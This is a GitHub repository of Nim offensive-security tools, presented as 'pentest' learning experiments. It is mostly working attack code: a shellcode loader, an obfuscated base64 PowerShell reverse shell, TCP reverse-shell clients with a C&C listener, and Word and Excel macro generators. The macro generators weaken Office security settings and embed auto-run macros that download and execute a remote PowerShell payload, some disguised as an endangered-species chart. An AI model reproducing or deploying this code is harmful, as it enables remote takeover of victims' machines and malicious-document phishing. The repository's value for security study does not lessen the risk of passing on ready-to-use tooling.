├── .gitattributes ├── BuildCLRNim.bat ├── ConvertToNimArray.cs ├── LICENSE ├── README.md ├── compilation.txt ├── loadCLR.nim ├── peinjection.nim ├── powershellnim.nim ├── procinjection.nim ├── tcprevcontroller.nim ├── tcprevshellvariant1.nim ├── tcprevshellvariant2.nim ├── wordmac.nim ├── xlmacrovairant1.nim ├── xlmacrovairant2.nim └── xlmacrovairant3.nim /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /BuildCLRNim.bat: -------------------------------------------------------------------------------- 1 | nim c --hints:off --warnings:off --app=gui -d:release -d:strip --opt:size --passc=-flto --passl=-flto .\clrassembly.nim -------------------------------------------------------------------------------- /ConvertToNimArray.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Text; 4 | ///

5 | /// Programmer : Diljith Suresh 6 | ///

7 | namespace ConvertToNimArray 8 | { 9 | class Program 10 | { 11 | static void Main(string[] args) 12 | { 13 | if(args.Length < 1) 14 | { 15 | Console.WriteLine("Please specify file path argument."); 16 | return; 17 | } 18 | string binpath = args[0]; 19 | byte[] readassembly = File.ReadAllBytes(binpath); 20 | 21 | 22 | StringBuilder hexCodes = new StringBuilder(readassembly.Length * 2); 23 | foreach (byte b in readassembly) 24 | { 25 | hexCodes.AppendFormat("0x{0:x2},", b); 26 | } 27 | 28 | string nimarray = "var buf: array[" + readassembly.Length.ToString() + ", byte]" + " = [byte "; 29 | Console.WriteLine(nimarray + hexCodes.ToString().Substring(0, hexCodes.ToString().Length - 1) + "]"); 30 | Console.ReadLine(); 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 aalphaas 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nim for Pentest 2 | 3 | ## Some of my nim learning experiments 4 | 5 | ### Projects 6 | 7 | ### 1 : PE Injection 8 | ### 2 : Load Dot Net binary to memory and execute 9 | ### 3 : Powershell reverse shell without invoking Powershell.exe 10 | ### 4 : TCP reverse shell 11 | ### 5 : Excel Macro automation 12 | ### 6 : Word Macro automation 13 | 14 | ### Effective Build option 15 | #### nim c --hints:off --warnings:off --app=gui -d:release -d:strip --opt:size --passc=-flto --passl=-flto .\sourcecode.nim 16 | 17 | #### A big thanks to https://github.com/byt3bl33d3r/OffensiveNim for WinAPI and other advanced base codes 18 | 19 | ### Author 20 | #### * **Diljith S** - *Initial work* - https://github.com/diljithishere -------------------------------------------------------------------------------- /compilation.txt: -------------------------------------------------------------------------------- 1 | https://nim-lang.org/docs/nimc.html 2 | 3 | nim c -d:release myproject.nim 4 | 5 | nim c --cc:llvm_gcc --compile_only myfile.nim 6 | 7 | 8 | nim c --cpu:i386 --os:linux --compileOnly --genScript myproject.nim 9 | 10 | nim c --cpu:arm --os:linux myproject.nim 11 | 12 | arm.linux.gcc.path = "/usr/bin" 13 | arm.linux.gcc.exe = "arm-linux-gcc" 14 | arm.linux.gcc.linkerexe = "arm-linux-gcc" 15 | 16 | Windows build from linux 17 | nim c -d:mingw myproject.nim 18 | 19 | nim c -c test.nim 20 | 21 | nim c -r --threads:on src/client.nim 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /loadCLR.nim: -------------------------------------------------------------------------------- 1 | import winim/clr 2 | 3 | var buf: array[9728, byte] = [byte 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00] 4 | var assembly = load(buf) 5 | 6 | var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments 7 | assembly.EntryPoint.Invoke(nil, toCLRVariant([arr])) 8 | 9 | #arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args 10 | #assembly.EntryPoint.Invoke(nil, toCLRVariant([arr])) 11 | 12 | -------------------------------------------------------------------------------- /peinjection.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | 3 | when defined(windows): #Checks whether this Nim code is being compiled on Windows 4 | var shellcode: array[791, byte] = [ 5 | byte 0x07,0x4e,0xaf,0x7d,0x48,0xd6,0x6e,0x46,0x8e, 6 | 0x9f,0xe7,0xf4,0xdb,0x16,0x50,0xcf,0x34,0xad,0x71,0x7d,0x70,0x9f,0xa9,0x86, 7 | 0x8e,0x40,0x32,0xbc,0x11,0x5b,0x89,0x03,0x4e,0xcb,0x55,0x92,0x19,0x98,0xe1, 8 | 0x87,0x4d,0x3a,0x27,0x81,0x40,0xc7,0x6a,0xde,0xe4,0xbf,0xbe,0xbd,0x55,0x5d, 9 | 0x59,0x33,0x2c,0xe9,0x18,0x21,0x92,0x9f,0xa9,0x86,0x8e] 10 | 11 | let shellCodePtr = VirtualAlloc(nil,cast[SIZE_T](shellcode.len), MEM_COMMIT,PAGE_EXECUTE_READ_WRITE) 12 | 13 | copyMem(shellCodePtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len)) # Copy Shellcode to the allocated memory section 14 | let tHandle = CreateThread(cast[LP_SECURITY_ATTRIBUTES](0), cast[SIZE_T](shellcode.len),cast[LPTHREAD_START_ROUTINE](shellCodePtr),cast[LPVOID](0),cast[DWORD](0),cast[LPDWORD](0)) # Run shell code 15 | WaitForSingleObject(cast[HANDLE](tHandle), cast[DWORD](0xFFFFFFFF)) -------------------------------------------------------------------------------- /powershellnim.nim: -------------------------------------------------------------------------------- 1 | import winim/clr 2 | import base64 3 | 4 | 5 | var Automation = load("System.Management.Automation") 6 | var RunspaceFactory = Automation.GetType("System.Management.Automation.Runspaces.RunspaceFactory") 7 | 8 | var runspace = @RunspaceFactory.CreateRunspace() 9 | 10 | runspace.Open() 11 | 12 | var pipeline = runspace.CreatePipeline() 13 | let strdecode = decode("ZnVuY3Rpb24gbWVzc3VwIHsNCmlmICgkY2xpZW50LkNvbm5lY3RlZCAtZXEgJHRydWUpIHskY2xpZW50LkNsb3NlKCl9DQppZiAoJHByb2Nlc3MuRXhpdENvZGUgLW5lICRudWxsKSB7JHByb2Nlc3MuQ2xvc2UoKX0NCmV4aXR9DQokYWRkcmVzcyA9ICcxOTIuMTY4LjEuNjgnDQokcG9ydCA9ICc0NDMnDQokY2xpZW50ID0gTmV3LU9iamVjdCBzeXN0ZW0ubmV0LnNvY2tldHMudGNwY2xpZW50DQokY2xpZW50LmNvbm5lY3QoJGFkZHJlc3MsJHBvcnQpDQokc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKQ0KJG5ldHdvcmtidWZmZXIgPSBOZXctT2JqZWN0IFN5c3RlbS5CeXRlW10gJGNsaWVudC5SZWNlaXZlQnVmZmVyU2l6ZQ0KJHByb2Nlc3MgPSBOZXctT2JqZWN0IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzDQokcHJvY2Vzcy5TdGFydEluZm8uRmlsZU5hbWUgPSAnQzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlJw0KJHByb2Nlc3MuU3RhcnRJbmZvLlJlZGlyZWN0U3RhbmRhcmRJbnB1dCA9IDENCiRwcm9jZXNzLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0ID0gMQ0KJHByb2Nlc3MuU3RhcnRJbmZvLlVzZVNoZWxsRXhlY3V0ZSA9IDANCiRwcm9jZXNzLlN0YXJ0KCkNCiRpbnB1dHN0cmVhbSA9ICRwcm9jZXNzLlN0YW5kYXJkSW5wdXQNCiRvdXRwdXRzdHJlYW0gPSAkcHJvY2Vzcy5TdGFuZGFyZE91dHB1dA0KU3RhcnQtU2xlZXAgMQ0KJGVuY29kaW5nID0gbmV3LW9iamVjdCBTeXN0ZW0uVGV4dC5Bc2NpaUVuY29kaW5nDQp3aGlsZSgkb3V0cHV0c3RyZWFtLlBlZWsoKSAtbmUgLTEpeyRvdXQgKz0gJGVuY29kaW5nLkdldFN0cmluZygkb3V0cHV0c3RyZWFtLlJlYWQoKSl9DQokc3RyZWFtLldyaXRlKCRlbmNvZGluZy5HZXRCeXRlcygkb3V0KSwwLCRvdXQuTGVuZ3RoKQ0KJG91dCA9ICRudWxsOyAkZG9uZSA9ICRmYWxzZTsgDQp3aGlsZSAoLW5vdCAkZG9uZSkgew0KaWYgKCRjbGllbnQuQ29ubmVjdGVkIC1uZSAkdHJ1ZSkge21lc3N1cH0NCiRwb3MgPSAwOyAkaSA9IDENCndoaWxlICgoJGkgLWd0IDApIC1hbmQgKCRwb3MgLWx0ICRuZXR3b3JrYnVmZmVyLkxlbmd0aCkpIHsNCiRyZWFkID0gJHN0cmVhbS5SZWFkKCRuZXR3b3JrYnVmZmVyLCRwb3MsJG5ldHdvcmtidWZmZXIuTGVuZ3RoIC0gJHBvcykNCiRwb3MrPSRyZWFkOyBpZiAoJHBvcyAtYW5kICgkbmV0d29ya2J1ZmZlclswLi4kKCRwb3MtMSldIC1jb250YWlucyAxMCkpIHticmVha319DQppZiAoJHBvcyAtZ3QgMCkgew0KJHN0cmluZyA9ICRlbmNvZGluZy5HZXRTdHJpbmcoJG5ldHdvcmtidWZmZXIsMCwkcG9zKQ0KJGlucHV0c3RyZWFtLndyaXRlKCRzdHJpbmcpDQpzdGFydC1zbGVlcCAxDQppZiAoJHByb2Nlc3MuRXhpdENvZGUgLW5lICRudWxsKSB7bWVzc3VwfQ0KZWxzZSB7DQokb3V0ID0gJGVuY29kaW5nLkdldFN0cmluZygkb3V0cHV0c3RyZWFtLlJlYWQoKSkNCndoaWxlKCRvdXRwdXRzdHJlYW0uUGVlaygpIC1uZSAtMSl7DQokb3V0ICs9ICRlbmNvZGluZy5HZXRTdHJpbmcoJG91dHB1dHN0cmVhbS5SZWFkKCkpOyBpZiAoJG91dCAtZXEgJHN0cmluZykgeyRvdXQgPSAnJ319DQokc3RyZWFtLldyaXRlKCRlbmNvZGluZy5HZXRCeXRlcygkb3V0KSwwLCRvdXQubGVuZ3RoKQ0KJG91dCA9ICRudWxsDQokc3RyaW5nID0gJG51bGx9fSBlbHNlIHttZXNzdXB9fQ==") 14 | #echo strdecode 15 | pipeline.Commands.AddScript(strdecode) 16 | 17 | pipeline.Invoke() 18 | 19 | runspace.Close() 20 | 21 | -------------------------------------------------------------------------------- /procinjection.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | 3 | when defined(windows): #Checks whether this Nim code is being compiled on Windows 4 | echo GetProcessId("explore.exe") 5 | # ToDO 6 | 7 | -------------------------------------------------------------------------------- /tcprevcontroller.nim: -------------------------------------------------------------------------------- 1 | import net 2 | #To Do 3 | var server: Socket = newSocket() 4 | #server.setSockOpt(OptReuseAddr, true) 5 | server.bindAddr(Port(443)) 6 | server.listen() 7 | stdout.writeLine("Waiting for a victim ....") 8 | 9 | var client: Socket 10 | var address = "" 11 | var cmresult: string 12 | while true: 13 | server.acceptAddr(client,address) 14 | echo("Client connected from: ", address) 15 | 16 | var command = readLine(stdin) 17 | echo(command) 18 | 19 | client.send(command) 20 | echo("received res") 21 | cmresult = client.recvLine() 22 | stdout.writeLine(cmresult) 23 | 24 | if cmresult == "bye": 25 | break 26 | 27 | server.close() -------------------------------------------------------------------------------- /tcprevshellvariant1.nim: -------------------------------------------------------------------------------- 1 | import net 2 | import osproc # for execCmdEx 3 | import os 4 | 5 | # Your C&C server IP and Port 6 | var ip = "192.168.1.68" 7 | var port = 443 8 | 9 | 10 | # Create a new socket 11 | var socket = newSocket() 12 | var finalcommand : string 13 | while true: 14 | try: 15 | socket.connect(ip, Port(port)) # Connect to our C&C server 16 | 17 | # On a successful connection receive command from C&C server , execute the command and send back result 18 | while true: 19 | try: 20 | socket.send(" ") 21 | var command = socket.recvLine() # Reads the command from our server to get executed on the victim machine 22 | if command == "bye": 23 | socket.send("Exiting Nim Shell") 24 | socket.close() 25 | system.quit(0) 26 | if system.hostOS == "windows": 27 | finalcommand = "cmd /C" & command 28 | else: 29 | finalcommand = "/bin/sh -c" & command 30 | var (cmdres, _) = execCmdEx(finalcommand) # Executes the command and saves the result in cmdres 31 | socket.send(cmdres) # Sends back the result to the C&C server 32 | except: 33 | socket.close() 34 | system.quit(0) 35 | 36 | # if connection fails , try after 5 seconds 37 | except: 38 | echo "Connection failed, Retry after 5 seconds..." 39 | sleep(5000) # Wait for 5 seconds 40 | continue -------------------------------------------------------------------------------- /tcprevshellvariant2.nim: -------------------------------------------------------------------------------- 1 | import net 2 | import osproc # for execCmdEx 3 | import os 4 | 5 | # Your C&C server IP and Port 6 | var ip = "192.168.1.68" 7 | var port = 443 8 | 9 | 10 | # Create a new socket 11 | var socket = newSocket() 12 | var finalcommand : string 13 | 14 | try: 15 | socket.connect(ip, Port(port)) # Connect to our C&C server 16 | 17 | # On a successful connection receive command from C&C server , execute the command and send back result 18 | while true: 19 | var command = socket.recvLine() # Reads the command from our server to get executed on the victim machine 20 | echo(command) 21 | if command == "bye": 22 | socket.send("Exiting Nim Shell") 23 | socket.close() 24 | system.quit(0) 25 | if system.hostOS == "windows": 26 | finalcommand = "cmd /C" & command 27 | else: 28 | finalcommand = "/bin/sh -c" & command 29 | var (cmdres, _) = execCmdEx(finalcommand) # Executes the command and saves the result in cmdres 30 | socket.send(cmdres) # Sends back the result to the C&C server 31 | 32 | socket.close() 33 | system.quit(0) 34 | 35 | # if connection fails , try after 5 seconds 36 | except: 37 | echo "Connection failed." 38 | -------------------------------------------------------------------------------- /wordmac.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | import os 4 | 5 | let wordfilename = paramStr(1) 6 | comScript: 7 | var objMsWord = CreateObject("Word.Application") 8 | var WshShell = CreateObject("WScript.Shell") 9 | var Application_Version = objMsWord.Version 10 | 11 | 12 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Word\Security\AccessVBOM" 13 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Word\Security\VBAWarnings" 14 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 15 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 16 | 17 | objMsWord.visible = true 18 | objMsWord.displayalerts = false 19 | 20 | #var objWordDoc = objMsWord.documents.Add() 21 | #var fn = r"D:\Dev369\NimForPentest\test.doc" 22 | #var objWordDoc = objMsWord.documents.Open(fn,ConfirmConversions:=FALSE,ReadOnly:=1,AddToRecentFiles:=0,PasswordDocument:="",PasswordTemplate:=0,Revert:=0,WritePasswordDocument:="",WritePasswordTemplate:="",Format:=0,Encoding:=20127,Visible:=0,OpenAndRepair:=0,DocumentDirection:=0,NoEncodingDialog:=0,XMLTransform:=0) 23 | var objWordDoc = objMsWord.documents.Add() 24 | objWordDoc.Activate() 25 | var wordVBmodule = objWordDoc.VBProject.VBComponents.Add(1) 26 | var strMacroRevShell = """Sub Auto_Open() 27 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 0) 28 | End Sub""" 29 | wordVBmodule.CodeModule.AddFromString(strMacroRevShell) 30 | 31 | echo wordfilename 32 | #objWordDoc.SaveAs(wordfilename,0) 33 | objWordDoc.SaveAs(wordfilename,FileFormat:=0,Password:="",WritePassword:="",ReadOnlyRecommended:=FALSE,AddToRecentFiles:=0,EmbedTrueTypeFonts:=0,SaveNativePictureFormat:=0,SaveFormsData:=0,SaveAsAOCELetter:=0,Encoding:=20127,InsertLineBreaks:=0,AllowSubstitutions:=TRUE,LineEnding:=0,AddBiDiMarks:=0) 34 | #objWordDoc.SaveAs(wordfilename,FileFormat:=0,LockComments:=0,Password:="",AddToRecentFiles:=0,WritePassword:="",ReadOnlyRecommended:=0,EmbedTrueTypeFonts:=0,SaveNativePictureFormat:=0,SaveFormsData:=0,SaveAsAOCELetter:=0,Encoding:=0,InsertLineBreaks:=0,AllowSubstitutions:=0,LineEnding:=0,AddBiDiMarks:=0) 35 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 36 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 37 | objWordDoc.Close(false) 38 | #COM_FullRelease() # make sure word.exe will end it self -------------------------------------------------------------------------------- /xlmacrovairant1.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | 4 | var objExcel = CreateObject("Excel.Application") 5 | objExcel.Visible= false 6 | var WshShell = CreateObject("WScript.Shell") 7 | var Application_Version = objExcel.Version 8 | 9 | var strRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 10 | WshShell.RegWrite(strRegPath, 1, "REG_DWORD") 11 | var objWorkbook = objExcel.Workbooks.Add() 12 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 13 | var strMacroRevShell = """Sub Auto_Open() 14 | Call Shell(""cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')"", 1) 15 | End Sub""" 16 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 17 | objWorkbook.SaveAs("test.xls") 18 | objExcel.DisplayAlerts = false 19 | objWorkbook.Close(false) 20 | 21 | 22 | -------------------------------------------------------------------------------- /xlmacrovairant2.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | 4 | comScript: 5 | var objExcel = CreateObject("Excel.Application") 6 | var WshShell = CreateObject("WScript.Shell") 7 | var Application_Version = objExcel.Version 8 | 9 | 10 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 11 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\VBAWarnings" 12 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 13 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 14 | 15 | objExcel.visible = true 16 | objExcel.sheetsInNewWorkBook = 1 17 | objExcel.displayalerts = false 18 | 19 | var objWorkbook = objExcel.workbooks.add() 20 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 21 | var strMacroRevShell = """Sub Workbook_Open() 22 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 1) 23 | End Sub""" 24 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 25 | objExcel.activeSheet.name = "Critically Endangered" 26 | 27 | 28 | 29 | for i, j in ["Mammals", "Birds", "Reptiles", "Fishes", "Plants"]: 30 | objExcel.activeSheet.cells(1, i + 1) = j # this line needs comScript macro 31 | 32 | for cell in objExcel.activeSheet.range("A1:E1"): 33 | cell.interior.color = RGB(0xee, 0xdd, 0x82) 34 | cell.interior.pattern = 1 35 | cell.font.size = 13 36 | cell.borders.color = RGB(0, 0, 0) 37 | cell.borders.lineStyle = 1 38 | cell.borders.weight = 2 39 | 40 | var sheet = objExcel.activeSheet 41 | sheet.range("A2").value = 184 42 | sheet.range("B2").value = 182 43 | sheet.range("C2").value = 57 44 | sheet.range("D2").value = 162 45 | sheet.range("E2").value = 1276 46 | 47 | sheet.range("A4:E4").merge() 48 | sheet.range("A4").value = "Source: IUCN Red List 2003" 49 | sheet.range("A1:E2").borderAround(1, 2, nil.variant, RGB(0, 0, 0)) 50 | 51 | sheet.columns("A:E").columnWidth = 12.5 52 | 53 | var xrange = objExcel.activeSheet.range("A1:E2") 54 | var xchart = objWorkbook.charts.add() 55 | xchart.chartWizard(xrange, -4100, 7, 1, 1, 0, false, "Critically Endangered Plants and Animals") 56 | xchart.HasAxis(3) = false 57 | var fn = r"D:\Dev369\NimForPentest\test.xls" 58 | objWorkbook.SaveAs(fn,FileFormat:=56,Password:=0,WriteResPassword:=0,ReadOnlyRecommended:=0,CreateBackup:=0,AccessMode:=1,ConflictResolution:=3,AddToMru:=0,TextCodepage:=0,TextVisualLayout:=0,Local:=0) 59 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 60 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 61 | COM_FullRelease() # make sure excel.exe will end it self -------------------------------------------------------------------------------- /xlmacrovairant3.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | import os 4 | 5 | let xlfilename = paramStr(1) 6 | comScript: 7 | var objExcel = CreateObject("Excel.Application") 8 | var WshShell = CreateObject("WScript.Shell") 9 | var Application_Version = objExcel.Version 10 | 11 | 12 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 13 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\VBAWarnings" 14 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 15 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 16 | 17 | objExcel.visible = false 18 | objExcel.sheetsInNewWorkBook = 1 19 | objExcel.displayalerts = false 20 | 21 | var objWorkbook = objExcel.workbooks.add() 22 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 23 | var strMacroRevShell = """Sub Auto_Open() 24 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 1) 25 | End Sub""" 26 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 27 | objExcel.activeSheet.name = "Critically Endangered" 28 | 29 | for i, j in ["Mammals", "Birds", "Reptiles", "Fishes", "Plants"]: 30 | objExcel.activeSheet.cells(1, i + 1) = j # this line needs comScript macro 31 | 32 | for cell in objExcel.activeSheet.range("A1:E1"): 33 | cell.interior.color = RGB(0xee, 0xdd, 0x82) 34 | cell.interior.pattern = 1 35 | cell.font.size = 13 36 | cell.borders.color = RGB(0, 0, 0) 37 | cell.borders.lineStyle = 1 38 | cell.borders.weight = 2 39 | 40 | var sheet = objExcel.activeSheet 41 | sheet.range("A2").value = 184 42 | sheet.range("B2").value = 182 43 | sheet.range("C2").value = 57 44 | sheet.range("D2").value = 162 45 | sheet.range("E2").value = 1276 46 | 47 | sheet.range("A4:E4").merge() 48 | sheet.range("A4").value = "Source: IUCN Red List 2003" 49 | sheet.range("A1:E2").borderAround(1, 2, nil.variant, RGB(0, 0, 0)) 50 | 51 | sheet.columns("A:E").columnWidth = 12.5 52 | 53 | var xrange = objExcel.activeSheet.range("A1:E2") 54 | var xchart = objWorkbook.charts.add() 55 | xchart.chartWizard(xrange, -4100, 7, 1, 1, 0, false, "Critically Endangered Plants and Animals") 56 | xchart.HasAxis(3) = false 57 | #var fn = r"D:\Dev369\NimForPentest\test.xls" 58 | objWorkbook.SaveAs(xlfilename,FileFormat:=56,Password:="",WriteResPassword:="",ReadOnlyRecommended:=FALSE,CreateBackup:=0,AccessMode:=1,ConflictResolution:=3,AddToMru:=0,TextCodepage:=0,TextVisualLayout:=0,Local:=0) 59 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 60 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 61 | objExcel.DisplayAlerts = false 62 | objWorkbook.Close(false) 63 | COM_FullRelease() # make sure excel.exe will end it self --------------------------------------------------------------------------------